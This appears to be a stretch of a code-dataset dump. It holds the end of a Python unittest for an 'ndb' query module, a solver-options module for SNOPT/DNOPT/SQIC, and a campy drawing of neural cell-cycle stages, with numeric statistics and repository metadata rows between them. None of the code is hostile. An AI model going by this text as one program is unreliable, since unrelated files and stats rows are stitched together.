        self.assertEquals(result[0].get('sex'), None)
        self.assertEquals(result[0].get('age'), None)
        result = ndb.execute(self.node, 'delete:root->parent->child->name:jim !! block')
        result = ndb.execute(result, 'select:root->parent->child->name:jim')
        self.assertEquals(len(result), 0);

    def test_insert(self):
        '''insert test'''
        result = ndb.execute(self.node, 'insert:root->parent->child !! name=bill, sex=male, age=31')
        select_result = ndb.execute(result, 'select:root->parent->child->name:bill')
        self.assertEquals(len(select_result), 1)
        self.assertEquals(select_result[0].get('sex'), 'male')
        self.assertEquals(select_result[0].get('age'), '31')

    def test_redirect(self):
        '''redirect test'''
        # '>> file.ndb' redirects a statement's result into a new ndb file.
        ndb.execute(self.node, 'select:root->parent->:/child|nephew/->sex:female >> select.ndb')
        node = ndb.read('select.ndb')
        select_result = ndb.execute(node, 'select:result->sex:female')
        self.assertEquals(len(select_result), 2)
        self.assertEquals(select_result[0].get('name'), 'lucy')
        self.assertEquals(select_result[1].get('name'), 'lily')
        ndb.execute(self.node, 'insert:root->parent->child !! name=bill, sex=male, age=31 >> insert.ndb')
        node = ndb.read('insert.ndb')
        select_result = ndb.execute(node, 'select:root->parent->child->name:bill')
        self.assertEquals(len(select_result), 1)
        self.assertEquals(select_result[0].get('name'), 'bill')
        self.assertEquals(select_result[0].get('sex'), "male")
        self.assertEquals(select_result[0].get('age'), "31")
        ndb.execute(self.node, 'update:root->parent->child->name:jim !! age=21, address=China >> update.ndb')
        node = ndb.read('update.ndb')
        select_result = ndb.execute(node, 'select:root->parent->child->name:jim')
        self.assertEquals(len(select_result), 1)
        self.assertEquals(select_result[0].get('name'), 'jim')
        self.assertEquals(select_result[0].get('address'), "China")
        self.assertEquals(select_result[0].get('age'), "21")
        # delete temp file
        files = ['select.ndb', 'insert.ndb', 'update.ndb']
        for filename in files:
            os.remove(filename)

    def test_script(self):
        '''script test'''
        # script: runs a batch of statements from a .script file.
        result = ndb.execute(self.node, "script:example.script")
        select_result = ndb.execute(result, 'select:root->parent->child->name:bill')
        self.assertEquals(len(select_result), 1)
        self.assertEquals(select_result[0].get('name'), 'bill')
        self.assertEquals(select_result[0].get('sex'), "male")
        self.assertEquals(select_result[0].get('age'), "31")
        select_result = ndb.execute(result, 'select:root->parent->child->name:lily')
        self.assertEquals(len(select_result), 1)
        self.assertEquals(select_result[0].get('name'), 'lily')
        self.assertEquals(select_result[0].get('address'), 'China')
        self.assertEquals(select_result[0].get('age'), '21')
        select_result = ndb.execute(result, 'select:root->parent->child->name:jim')
        self.assertEquals(len(select_result), 1)
        self.assertEquals(select_result[0].get('name'), 'jim')
        self.assertEquals(select_result[0].get('sex'), None)
        self.assertEquals(select_result[0].get('age'), None)

    def test_print_node(self):
        '''node print test'''
        result = ndb.print_node(None, self.node)
        print result
# Script entry point: run the whole test suite.
if __name__ == '__main__':
    unittest.main()
| 43.930818
| 109
| 0.607731
| 870
| 6,985
| 4.81954
| 0.090805
| 0.206058
| 0.071548
| 0.081565
| 0.824469
| 0.773193
| 0.746721
| 0.69616
| 0.69616
| 0.674934
| 0
| 0.015371
| 0.208304
| 6,985
| 158
| 110
| 44.208861
| 0.742857
| 0.010451
| 0
| 0.353982
| 0
| 0.017699
| 0.235119
| 0.151425
| 0
| 0
| 0
| 0
| 0.522124
| 0
| null | null | 0
| 0.026549
| null | null | 0.026549
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3673881a0780666794f68e26d130d3eae92b5035
| 15,914
|
py
|
Python
|
solvers/options.py
|
jainajinkya/snopt-python
|
832a12c2422d23bbd7d3a476a3a3ae50ac7fc84f
|
[
"MIT"
] | null | null | null |
solvers/options.py
|
jainajinkya/snopt-python
|
832a12c2422d23bbd7d3a476a3a3ae50ac7fc84f
|
[
"MIT"
] | null | null | null |
solvers/options.py
|
jainajinkya/snopt-python
|
832a12c2422d23bbd7d3a476a3a3ae50ac7fc84f
|
[
"MIT"
] | null | null | null |
from abc import ABC
from optimize.solvers import snopt7_python as fsnopt
from optimize.solvers import dnopt_python as fdnopt
#-------------------------------------------------------------------------------#
def copyOpts(verbose, usropts, work):
    """Copy every user-set option from ``usropts`` into the solver workspace.

    Parameters
    ----------
    verbose : bool
        When true, echo each option string as it is set.
    usropts : SNOPT_options or DNOPT_options
        Option table; each entry is [current value, default value, type].
    work : workspace object
        Must expose ``cw``, ``iw``, ``rw`` arrays for the Fortran interface.

    Returns
    -------
    int
        The ``info`` code from the last copyoptions call (0 if none made).
    """
    info = 0
    # Keywords consumed by the Python layer itself; never sent to the solver.
    python_only = ('Verbose', 'Start type', 'Specs filename',
                   'Print filename', 'Summary', 'Max memory attempts')
    for key in sorted(usropts.options.keys()):
        if key in python_only:
            continue
        value = usropts.options[key][0]
        if value is None:
            continue  # option left at the solver's internal default
        if type(value) is bool:
            # Bug fix: the original tested ``value is bool`` (a value is
            # never the type object, so this branch never ran) and the
            # unparenthesized ternary bound as
            # ``(key + ' yes') if cond else 'no'``, dropping the keyword.
            optstr = key + ' ' + ('yes' if value is True else 'no')
        else:
            optstr = key + ' ' + str(value)
        if verbose:
            print(' Setting option: ' + optstr)
        if type(usropts) is SNOPT_options:
            info = fsnopt.copyoptions(optstr, work.cw, work.iw, work.rw)
        elif type(usropts) is DNOPT_options:
            info = fdnopt.copyoptions(optstr, work.cw, work.iw, work.rw)
    return info
#-------------------------------------------------------------------------------#
class OptionsClass(ABC):
    '''
    Base class for solver option tables.

    ``self.options`` maps each option keyword to a list
    ``[current value, default value, expected type]``; a current value of
    None means "leave at the solver's internal default".
    '''
    def __init__(self):
        self.setup()
        self.solverName = 'None'

    def setup(self):
        # Subclasses override this to populate the option table.
        self.options = None

    def __str__(self):
        """Return a human-readable listing of all options."""
        text = '\n' + self.solverName + ' options \n'
        # Bug fix: dict.keys() returns a view with no .sort() on Python 3;
        # iterate the keys through sorted() instead.
        for key in sorted(self.options):
            value = self.options[key][0]
            if value is None:
                text += ' ' + str(key) + ': undefined\n'
            else:
                text += ' ' + str(key) + ': ' + str(value) + '\n'
        text += '\n' + self.solverName + \
                ' will set any parameters that are undefined to defaults.\n' + \
                'Please refer to ' + self.solverName + ' documentation for details.\n'
        return text

    def printOptions(self):
        # Bug fix: __repr__ is not overridden here, so the original
        # printed the default object repr; print the formatted __str__.
        print(self)

    def setOption(self, name, value):
        """Set option ``name`` to ``value``; the type must match the table."""
        try:
            expected = self.options[name][2]
        except (KeyError, TypeError):
            raise RuntimeError('Incorrect option keyword or type: ' + name)
        # Bug fix: the original silently ignored a type mismatch (the
        # ``if`` simply failed inside the try); raise as the message promises.
        if type(value) is not expected:
            raise RuntimeError('Incorrect option keyword or type: ' + name)
        self.options[name][0] = value

    def getOption(self, name):
        """Return the current value of option ``name``."""
        try:
            return self.options[name][0]
        except (KeyError, TypeError):
            raise RuntimeError('Incorrect option keyword: ' + name)

    def resetOption(self, name):
        """Reset option ``name`` to its default value."""
        try:
            # Bug fix: the original replaced the whole [cur, default, type]
            # list with the bare default value, corrupting the entry for
            # any later getOption/setOption call. Reset only element 0.
            self.options[name][0] = self.options[name][1]
        except (KeyError, TypeError):
            raise RuntimeError('Incorrect option keyword: ' + name)
#-------------------------------------------------------------------------------#
class SQIC_options(OptionsClass):
    '''
    Option table for the SQIC QP solver.

    Each entry maps a keyword to [current value, default value, type];
    a current value of None means "use the solver's internal default".
    See OptionsClass for set/get/reset behavior.
    '''
    def __init__(self):
        self.setup()
        self.solverName = 'SQIC'

    def setup(self):
        # Populate the option table. Commented-out entries are options the
        # solver understands but that are not exposed through this layer.
        self.options = {
            # [Current value, default value, type]
            'Start type'             : ['Cold','Cold',str],
            'Specs filename'         : [None,None,str],
            'Print filename'         : ['SQIC.out','SQIC.out',str],
            'Print frequency'        : [None,None,int],
            'Print level'            : [None,None,int], # minor print level
            'Summary'                : ['yes','yes',str],
            'Summary frequency'      : [None,None,int],
            'Solution file'          : [None,None,int],
            'Solution print'         : [None,None,bool],
            'Minor print level'      : [None,None,int],
            'Sticky parameters'      : [None,None,int],
            'Suppress'               : [None,None,int],
            'Time limit'             : [None,None,float],
            'Timing level'           : [None,None,int],
            'System information'     : [None,None,int],
            'Verify level'           : [None,None,int],
            #'Problem minmax'        : ['Minimize','Minimize',str],
            'Proximal point'         : [None,None,int],
            #'QP solver'             : [None,None,str], # Cholesky/CG/QN
            'Minor phase1'           : [None,None,float], #tolOptFP
            'Feasibility tolerance'  : [None,None,float], #tolx
            'Optimality tolerance'   : [None,None,float], #tolOptQP
            'Iteration limit'        : [None,None,int], #itnlim
            'CG tolerance'           : [None,None,float],
            'CG preconditioning'     : [None,None,int],
            'CG iterations'          : [None,None,int],
            'Crash option'           : [None,None,int],
            'Crash tolerance'        : [None,None,float],
            'Debug level'            : [None,None,int],
            'Derivative level'       : [None,None,int],
            'Derivative linesearch'  : [None,None,int],
            'Derivative option'      : [None,None,int],
            'Elastic objective'      : [None,None,int],
            'Elastic mode'           : [None,None,int],
            'Elastic weight'         : [None,None,float],
            'Elastic weightmax'      : [None,None,float],
            'Hessian frequency'      : [None,None,int],
            'Hessian flush'          : [None,None,int],
            'Hessian type'           : [None,None,int],
            'Hessian updates'        : [None,None,int],
            'Infinite bound'         : [1.0e+20,1.0e+20,float],
            'Major step limit'       : [None,None,float],
            'Unbounded objective'    : [None,None,float],
            'Unbounded step'         : [None,None,float],
            #'LU type'               : [None,None,str], #partial/complete/rook
            'LU swap'                : [None,None,float],
            'LU factor tolerance'    : [None,None,float],
            'LU update tolerance'    : [None,None,float],
            'LU density'             : [None,None,float],
            'LU singularity'         : [None,None,float],
            'New superbasics'        : [None,None,int],
            'Partial pricing'        : [None,None,int],
            'Penalty parameter'      : [None,None,float],
            'Pivot tolerance'        : [None,None,float],
            'Reduced Hessian limit'  : [None,None,int],
            'Superbasics limit'      : [None,None,int],
            'Scale option'           : [None,None,int],
            'Scale tolerance'        : [None,None,float],
            'Scale print'            : [None,None,int],
            'Verbose'                : [False,False,bool] # python verbose
        }
#-------------------------------------------------------------------------------#
class SNOPT_options(OptionsClass):
    '''
    Option table for the SNOPT nonlinear solver.

    Each entry maps a keyword to [current value, default value, type];
    a current value of None means "use the solver's internal default".
    Entries marked ## are consumed by the Python layer and are not
    forwarded to the solver (see copyOpts).
    '''
    def __init__(self):
        self.setup()
        self.solverName = 'SNOPT'

    def setup(self):
        # Populate the option table. Commented-out entries are options the
        # solver understands but that are not exposed through this layer.
        self.options = {
            # [Current value, default value, type]
            'Start type'                : ['Cold','Cold',str], ##
            'Specs filename'            : [None,None,str], ##
            'Print filename'            : ['SNOPT.out','SNOPT.out',str], ##
            'Print frequency'           : [None,None,int],
            'Print level'               : [None,None,int], # minor print level
            'Summary'                   : ['yes','yes',str],
            'Summary frequency'         : [None,None,int],
            'Solution file'             : [None,None,int],
            'Solution print'            : [None,None,bool],
            'Major print level'         : [None,None,int],
            'Minor print level'         : [None,None,int],
            'Sticky parameters'         : [None,None,int],
            'Suppress'                  : [None,None,int],
            'Time limit'                : [None,None,float],
            'Timing level'              : [None,None,int],
            'System information'        : [None,None,int],
            'Verify level'              : [None,None,int],
            'Max memory attempts'       : [10,10,int],
            'Total character workspace' : [None,None,int],
            'Total integer workspace'   : [None,None,int],
            'Total real workspace'      : [None,None,int],
            #'Problem minmax'           : ['Minimize','Minimize',str],
            'Proximal point'            : [None,None,int],
            #'QP solver'                : [None,None,str], # Cholesky/CG/QN
            'Major feasibility'         : [None,None,float], #tolCon
            'Major optimality'          : [None,None,float], #tolOptNP
            'Minor feasibility'         : [None,None,float], #tolx
            'Minor optimality'          : [None,None,float], #tolOptQP
            'Minor phase1'              : [None,None,float], #tolOptFP
            'Feasibility tolerance'     : [None,None,float], #tolx
            'Optimality tolerance'      : [None,None,float], #tolOptQP
            'Iteration limit'           : [None,None,int], #itnlim
            'Major iterations'          : [None,None,int], #mMajor
            'Minor iterations'          : [None,None,int], #mMinor
            'CG tolerance'              : [None,None,float],
            'CG preconditioning'        : [None,None,int],
            'CG iterations'             : [None,None,int],
            'Crash option'              : [None,None,int],
            'Crash tolerance'           : [None,None,float],
            'Debug level'               : [None,None,int],
            'Derivative level'          : [None,None,int],
            'Derivative linesearch'     : [None,None,int],
            'Derivative option'         : [None,None,int],
            'Elastic objective'         : [None,None,int],
            'Elastic mode'              : [None,None,int],
            'Elastic weight'            : [None,None,float],
            'Elastic weightmax'         : [None,None,float],
            'Hessian frequency'         : [None,None,int],
            'Hessian flush'             : [None,None,int],
            'Hessian type'              : [None,None,int],
            'Hessian updates'           : [None,None,int],
            'Infinite bound'            : [1.0e+20,1.0e+20,float],
            'Major step limit'          : [None,None,float],
            'Unbounded objective'       : [None,None,float],
            'Unbounded step'            : [None,None,float],
            'Linesearch tolerance'      : [None,None,float],
            'Linesearch debug'          : [None,None,int],
            #'LU type'                  : [None,None,str], #partial/complete/rook
            'LU swap'                   : [None,None,float],
            'LU factor tolerance'       : [None,None,float],
            'LU update tolerance'       : [None,None,float],
            'LU density'                : [None,None,float],
            'LU singularity'            : [None,None,float],
            'New superbasics'           : [None,None,int],
            'Partial pricing'           : [None,None,int],
            'Penalty parameter'         : [None,None,float],
            'Pivot tolerance'           : [None,None,float],
            'Reduced Hessian limit'     : [None,None,int],
            'Superbasics limit'         : [None,None,int],
            'Scale option'              : [None,None,int],
            'Scale tolerance'           : [None,None,float],
            'Scale print'               : [None,None,int],
            'Verbose'                   : [False,False,bool] ##
        }
#-------------------------------------------------------------------------------#
class DNOPT_options(OptionsClass):
    '''
    Option table for the DNOPT dense nonlinear solver.

    Each entry maps a keyword to [current value, default value, type];
    a current value of None means "use the solver's internal default".
    Entries marked ## are consumed by the Python layer and are not
    forwarded to the solver (see copyOpts).
    '''
    def __init__(self):
        self.setup()
        self.solverName = 'DNOPT'

    def setup(self):
        # Populate the option table. Commented-out entries are options the
        # solver understands but that are not exposed through this layer.
        self.options = {
            # [Current value, default value, type]
            'Start type'                : ['Cold','Cold',str], ##
            'Specs filename'            : [None,None,str], ##
            # NOTE(review): default 'SNOPT.out' looks copy-pasted from
            # SNOPT_options — confirm whether DNOPT should default to
            # 'DNOPT.out' instead.
            'Print filename'            : ['SNOPT.out','SNOPT.out',str], ##
            'Print frequency'           : [None,None,int],
            'Print level'               : [None,None,int], # minor print level
            'Summary'                   : ['yes','yes',str],
            'Summary frequency'         : [None,None,int],
            'Solution file'             : [None,None,int],
            'Solution print'            : [None,None,bool],
            'Major print level'         : [None,None,int],
            'Minor print level'         : [None,None,int],
            'Sticky parameters'         : [None,None,int],
            'Suppress'                  : [None,None,int],
            'Time limit'                : [None,None,float],
            'Timing level'              : [None,None,int],
            'System information'        : [None,None,int],
            'Verify level'              : [None,None,int],
            'Max memory attempts'       : [10,10,int],
            'Total character workspace' : [None,None,int],
            'Total integer workspace'   : [None,None,int],
            'Total real workspace'      : [None,None,int],
            #'Problem minmax'           : ['Minimize','Minimize',str],
            'Proximal point'            : [None,None,int],
            #'QP solver'                : [None,None,str], # Cholesky/CG/QN
            'Major feasibility'         : [None,None,float], #tolCon
            'Major optimality'          : [None,None,float], #tolOptNP
            'Minor feasibility'         : [None,None,float], #tolx
            'Minor optimality'          : [None,None,float], #tolOptQP
            'Minor phase1'              : [None,None,float], #tolOptFP
            'Feasibility tolerance'     : [None,None,float], #tolx
            'Optimality tolerance'      : [None,None,float], #tolOptQP
            'Iteration limit'           : [None,None,int], #itnlim
            'Major iterations'          : [None,None,int], #mMajor
            'Minor iterations'          : [None,None,int], #mMinor
            'CG tolerance'              : [None,None,float],
            'CG preconditioning'        : [None,None,int],
            'CG iterations'             : [None,None,int],
            'Crash option'              : [None,None,int],
            'Crash tolerance'           : [None,None,float],
            'Debug level'               : [None,None,int],
            'Derivative level'          : [None,None,int],
            'Derivative linesearch'     : [None,None,int],
            'Derivative option'         : [None,None,int],
            'Elastic objective'         : [None,None,int],
            'Elastic mode'              : [None,None,int],
            'Elastic weight'            : [None,None,float],
            'Elastic weightmax'         : [None,None,float],
            'Hessian frequency'         : [None,None,int],
            'Hessian flush'             : [None,None,int],
            'Hessian type'              : [None,None,int],
            'Hessian updates'           : [None,None,int],
            'Infinite bound'            : [1.0e+20,1.0e+20,float],
            'Major step limit'          : [None,None,float],
            'Unbounded objective'       : [None,None,float],
            'Unbounded step'            : [None,None,float],
            'Linesearch tolerance'      : [None,None,float],
            'Linesearch debug'          : [None,None,int],
            #'LU type'                  : [None,None,str], #partial/complete/rook
            'LU swap'                   : [None,None,float],
            'LU factor tolerance'       : [None,None,float],
            'LU update tolerance'       : [None,None,float],
            'LU density'                : [None,None,float],
            'LU singularity'            : [None,None,float],
            'Partial pricing'           : [None,None,int],
            'Penalty parameter'         : [None,None,float],
            'Pivot tolerance'           : [None,None,float],
            'Reduced Hessian limit'     : [None,None,int],
            'Scale option'              : [None,None,int],
            'Scale tolerance'           : [None,None,float],
            'Scale print'               : [None,None,int],
            'Verbose'                   : [False,False,bool] ##
        }
| 40.085642
| 91
| 0.460664
| 1,471
| 15,914
| 4.960571
| 0.123046
| 0.201727
| 0.158284
| 0.078388
| 0.841168
| 0.838016
| 0.828971
| 0.808003
| 0.79841
| 0.773194
| 0
| 0.00475
| 0.378283
| 15,914
| 396
| 92
| 40.186869
| 0.732767
| 0.086339
| 0
| 0.789286
| 0
| 0
| 0.231485
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.010714
| 0
| 0.085714
| 0.05
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
36773213d1540fdf62f0b5d098963941c8d666bd
| 45,301
|
py
|
Python
|
stanCode_Projects/my_drawing/my_drawing.py
|
clairejrlin/stanCode_projects
|
452a93f9db2de610d0580faecca80b3c3d311395
|
[
"MIT"
] | null | null | null |
stanCode_Projects/my_drawing/my_drawing.py
|
clairejrlin/stanCode_projects
|
452a93f9db2de610d0580faecca80b3c3d311395
|
[
"MIT"
] | null | null | null |
stanCode_Projects/my_drawing/my_drawing.py
|
clairejrlin/stanCode_projects
|
452a93f9db2de610d0580faecca80b3c3d311395
|
[
"MIT"
] | null | null | null |
"""
File: My drawing - The neuron cell cycle of brain neural development
Name:Claire Lin
----------------------
TODO: The cell cycle of brain neural development. It's also like a programming.
"""
from campy.graphics.gobjects import GOval, GRect, GArc, GLine, GLabel
from campy.graphics.gwindow import GWindow
# Shared drawing canvas used by every draw function in this module.
window = GWindow(width=1200, height=500, title='Brain neural development')
def main():
    """
    Draw the full scene: every phase of the neural cell cycle, then the
    decorative neurons, labels and arrows, in back-to-front order.
    """
    # Draw order matters: later steps paint over earlier ones.
    draw_steps = (lines, g1_s_cell, s_cell, g2_cell, m_cell,
                  g1_cell, g1_s2_cell, neurons, word, arrow)
    for step in draw_steps:
        step()
def g1_s_cell():
    """
    Draw the three overlapping G1/S-phase neurons.

    The original repeated the same ~70-line shape sequence three times;
    the only differences are a horizontal offset and the colors, so the
    sequence is factored into one parameterized helper.
    """
    def draw_neuron(dx, body_color, nucleus_color):
        # One neuron: body oval, surrounding body/fiber arcs and nucleus,
        # all shifted horizontally by dx from the leftmost neuron.
        neuron = GOval(width=40, height=60)
        neuron.filled = True
        neuron.color = body_color
        neuron.fill_color = body_color
        window.add(neuron, x=100 + dx, y=280)
        line = GLine(140 + dx, 200, 140 + dx, 200)
        line.color = 'gray'
        window.add(line)
        # (width, height, start, sweep, x, y) for each body-colored arc,
        # in the original draw order.
        for w, h, start, sweep, x, y in (
                (50, 80, 250, 200, 110, 270),
                (55, 95, 70, 210, 100, 265),
                (40, 70, 80, 200, 96, 280),
                (35, 110, 45, 85, 110, 340),
                (10, 210, 95, 180, 125, 70),    # first fiber
                (7, 110, 270, 260, 121, 60),    # on first fiber
                (9, 110, 75, 180, 123, 28),     # on first fiber
                (6, 40, 330, 200, 116, 25),     # on first fiber head
                (5, 55, 200, 170, 127, 20),     # on first fiber head
                (7, 80, 95, 180, 120, 340),     # second fiber
                (35, 80, 230, 90, 109, 386),    # cell bottom
                (35, 110, 215, 95, 112, 225)):  # cell head
            arc = GArc(w, h, start, sweep)
            arc.filled = True
            arc.color = body_color
            arc.fill_color = body_color
            window.add(arc, x + dx, y)
        nucleus = GOval(width=25, height=45)
        nucleus.filled = True
        nucleus.color = nucleus_color
        nucleus.fill_color = nucleus_color
        window.add(nucleus, x=105 + dx, y=290)

    # Same offsets and colors as the original three copies; the skyblue
    # neuron is drawn last so it overlaps the two lightblue ones.
    draw_neuron(0, 'lightblue', 'wheat')
    draw_neuron(50, 'lightblue', 'wheat')
    draw_neuron(20, 'skyblue', 'orange')
def s_cell():
    """
    Draw the S-phase neuron (body, fibers and duplicating nucleus).

    All coordinates are identical to the original; the repeated
    fill-and-place boilerplate is factored into a local helper.
    """
    def add_filled(shape, color, x, y):
        # Fill ``shape`` with ``color`` and place it at (x, y).
        shape.filled = True
        shape.color = color
        shape.fill_color = color
        window.add(shape, x, y)

    add_filled(GOval(width=40, height=70), 'skyblue', 238, 227)
    add_filled(GOval(width=40, height=50), 'skyblue', 231, 240)
    add_filled(GArc(55, 65, 60, 200), 'skyblue', 221, 230)
    add_filled(GArc(80, 100, 210, 85), 'skyblue', 235, 192)   # neuron head
    add_filled(GArc(10, 210, 95, 180), 'skyblue', 260, 70)    # first fiber
    add_filled(GArc(5, 110, 75, 180), 'skyblue', 263, 28)     # on first fiber
    add_filled(GArc(6, 40, 330, 200), 'skyblue', 255, 25)     # on first fiber head
    add_filled(GArc(25, 70, 30, 70), 'skyblue', 262, 22)      # on first fiber head
    add_filled(GArc(9, 140, 80, 180), 'skyblue', 242, 290)    # second fiber
    add_filled(GArc(30, 80, 230, 90), 'skyblue', 231, 386)    # cell bottom
    add_filled(GArc(35, 80, 22, 113), 'skyblue', 231, 283)    # cell bottom
    add_filled(GArc(57, 45, 60, 170), 'orange', 233, 233)     # nucleus
    add_filled(GArc(50, 50, 250, 150), 'orange', 232, 228)    # nucleus
def g2_cell():
    """
    Draw the G2-phase cell (two body halves with a doubled nucleus).

    All coordinates are identical to the original; the repeated
    fill-and-place boilerplate is factored into a local helper.
    """
    def add_filled(shape, color, x, y):
        # Fill ``shape`` with ``color`` and place it at (x, y).
        shape.filled = True
        shape.color = color
        shape.fill_color = color
        window.add(shape, x, y)

    add_filled(GArc(80, 80, 80, 180), 'skyblue', 340, 300)    # left cell body
    add_filled(GArc(80, 80, 265, 180), 'skyblue', 338, 298)   # right cell body
    add_filled(GArc(50, 50, 50, 80), 'skyblue', 344, 370)     # bottom
    add_filled(GArc(50, 60, 230, 70), 'skyblue', 350, 277)    # head
    add_filled(GArc(10, 240, 95, 180), 'skyblue', 360, 70)    # first fiber
    add_filled(GArc(5, 110, 75, 180), 'skyblue', 363, 28)     # on first fiber
    add_filled(GArc(6, 50, 330, 190), 'skyblue', 355, 20)     # on first fiber head
    add_filled(GArc(25, 70, 30, 60), 'skyblue', 362, 22)      # on first fiber head
    add_filled(GArc(40, 50, 70, 180), 'orange', 350, 315)     # left cell nucleus
    add_filled(GArc(35, 50, 255, 180), 'orange', 350, 313)    # right cell nucleus
    add_filled(GArc(9, 40, 80, 180), 'skyblue', 358, 380)     # second fiber
    add_filled(GArc(50, 50, 240, 70), 'skyblue', 345, 398)
def m_cell():
    """
    Draw the M-phase (mitotic) cell — body, condensed chromosomes,
    spindle microtubules and centrosomes — followed by the two
    daughter cells.

    All coordinates are identical to the original; the repeated
    boilerplate is factored into a local helper and data tables.
    Draw order is preserved because later shapes paint over earlier ones.
    """
    def add_filled(shape, color, x, y):
        # Fill ``shape`` with ``color`` and place it at (x, y).
        shape.filled = True
        shape.color = color
        shape.fill_color = color
        window.add(shape, x, y)

    # Dividing cell body and its fiber.
    add_filled(GArc(170, 65, 90, 180), 'skyblue', 430, 356)   # left cell body
    add_filled(GArc(175, 65, 270, 180), 'skyblue', 432, 356)  # right cell body
    add_filled(GArc(70, 80, 236, 100), 'skyblue', 433, 328)   # head
    add_filled(GArc(10, 290, 95, 180), 'skyblue', 458, 70)    # first fiber
    add_filled(GArc(5, 110, 75, 180), 'skyblue', 461, 28)     # on first fiber
    add_filled(GArc(6, 53, 340, 180), 'skyblue', 453, 20)     # on first fiber head
    add_filled(GArc(25, 90, 30, 60), 'skyblue', 460, 22)      # on first fiber head

    # Five condensed chromosomes, four arcs each; colors alternate.
    # y-positions are irregular in the original, so they stay literal.
    for color, y1, y2, y3, y4 in (('orange', 360, 360, 355, 370),
                                  ('darkorange', 368, 368, 363, 378),
                                  ('orange', 376, 376, 371, 386),
                                  ('darkorange', 388, 388, 383, 390),
                                  ('orange', 396, 398, 390, 402)):
        add_filled(GArc(10, 30, 140, 180), color, 473, y1)
        add_filled(GArc(10, 20, 60, 190), color, 473, y2)
        add_filled(GArc(10, 20, 140, 180), color, 465, y3)
        add_filled(GArc(10, 20, 60, 190), color, 465, y4)

    # Spindle microtubules: white outline arcs (not filled).
    for w, h, start, sweep, x, y in (
            (30, 60, 40, 140, 446, 370),
            (30, 65, 60, 100, 446, 380),
            (30, 50, 190, 140, 446, 375),
            (30, 50, 180, 120, 446, 380),
            (25, 50, 160, 150, 446, 380),
            (25, 50, 240, 100, 446, 375),
            (25, 50, 240, 100, 426, 377),
            (35, 50, 265, 90, 426, 377),
            (35, 50, 195, 90, 430, 368),
            (35, 50, 175, 90, 438, 360),
            (35, 50, 195, 90, 505, 380),   # microtubule right
            (35, 45, 170, 90, 503, 380),
            (35, 45, 110, 100, 497, 390),
            (45, 60, 80, 110, 490, 390),
            (40, 50, 60, 110, 495, 385),
            (40, 50, 90, 90, 502, 375),
            (40, 50, 90, 90, 502, 375),
            (20, 40, 60, 145, 500, 365),
            (20, 20, 20, 165, 485, 386),
            (30, 60, 10, 110, 480, 380),
            (40, 70, 5, 120, 470, 370)):
        microtubule = GArc(w, h, start, sweep)
        microtubule.color = 'white'
        window.add(microtubule, x, y)

    # Centrosomes at the two spindle poles.
    for x in (443, 500):
        add_filled(GOval(width=5, height=5), 'darksalmon', x, 385)

    # First daughter cell (skyblue) with its fiber and nucleus.
    add_filled(GArc(95, 65, 90, 180), 'skyblue', 545, 356)    # left cell body
    add_filled(GArc(100, 60, 270, 180), 'skyblue', 545, 360)  # right cell body
    add_filled(GArc(70, 80, 236, 70), 'skyblue', 549, 328)    # head
    add_filled(GOval(width=25, height=40), 'orange', 555, 370)
    add_filled(GArc(10, 290, 95, 180), 'skyblue', 567, 70)    # first fiber
    add_filled(GArc(5, 110, 75, 180), 'skyblue', 568, 28)     # on first fiber
    add_filled(GArc(6, 53, 340, 180), 'skyblue', 560, 20)     # on first fiber head
    add_filled(GArc(25, 90, 30, 62), 'skyblue', 567, 28)      # on first fiber head
    add_filled(GArc(7, 10, 75, 180), 'skyblue', 568, 415)     # on second fiber

    # Second daughter cell (steelblue) with its fiber and nucleus.
    add_filled(GArc(95, 70, 90, 180), 'steelblue', 573, 305)   # left cell body
    add_filled(GArc(100, 70, 270, 180), 'steelblue', 573, 305) # right cell body
    add_filled(GArc(70, 90, 60, 86), 'steelblue', 579, 358)    # head
    add_filled(GArc(12, 80, 75, 180), 'steelblue', 598, 345)   # on first fiber
    add_filled(GArc(70, 60, 250, 60), 'steelblue', 582, 393)
    add_filled(GOval(width=25, height=40), 'orange', 585, 320)
def g1_cell():
    """Draw the G1-stage cell pair: a sky-blue neuron with fibers and a
    steel-blue multipolar cell, each with an orange nucleus.

    Uses the module-level `window` (GWindow) defined elsewhere in this file.
    """
    def _arc(width, height, start, sweep, color, x, y):
        # Helper: filled GArc whose outline and fill share one color.
        shape = GArc(width, height, start, sweep)
        shape.filled = True
        shape.color = color
        shape.fill_color = color
        window.add(shape, x, y)

    def _oval(width, height, color, x, y):
        # Helper: filled GOval whose outline and fill share one color.
        shape = GOval(width=width, height=height)
        shape.filled = True
        shape.color = color
        shape.fill_color = color
        window.add(shape, x, y)

    # Sky-blue neuron.
    _oval(40, 60, 'skyblue', 650, 280)              # cell body
    _arc(50, 80, 250, 200, 'skyblue', 660, 270)
    _arc(55, 95, 70, 210, 'skyblue', 650, 265)
    _arc(40, 70, 80, 200, 'skyblue', 646, 280)
    _arc(35, 110, 45, 85, 'skyblue', 660, 340)
    _arc(10, 210, 95, 180, 'skyblue', 675, 70)      # first fiber
    _arc(7, 110, 270, 260, 'skyblue', 671, 60)      # on first fiber
    _arc(9, 110, 75, 180, 'skyblue', 673, 28)       # on first fiber
    _arc(6, 40, 330, 200, 'skyblue', 666, 25)       # on first fiber head
    _arc(5, 55, 200, 170, 'skyblue', 677, 20)       # on first fiber head
    _arc(7, 80, 95, 180, 'skyblue', 670, 340)       # second fiber
    _arc(35, 80, 230, 90, 'skyblue', 659, 386)      # cell bottom
    _arc(35, 110, 215, 95, 'skyblue', 662, 225)     # cell head
    _oval(25, 45, 'orange', 655, 290)               # nucleus
    # Steel-blue multipolar cell.
    _oval(40, 40, 'steelblue', 700, 190)            # body
    _arc(10, 60, 60, 250, 'steelblue', 718, 150)    # foot 1
    _arc(50, 60, 230, 70, 'steelblue', 707, 167)
    _arc(250, 100, 150, 25, 'steelblue', 658, 190)  # foot 2
    _arc(50, 60, 300, 70, 'steelblue', 682, 184)
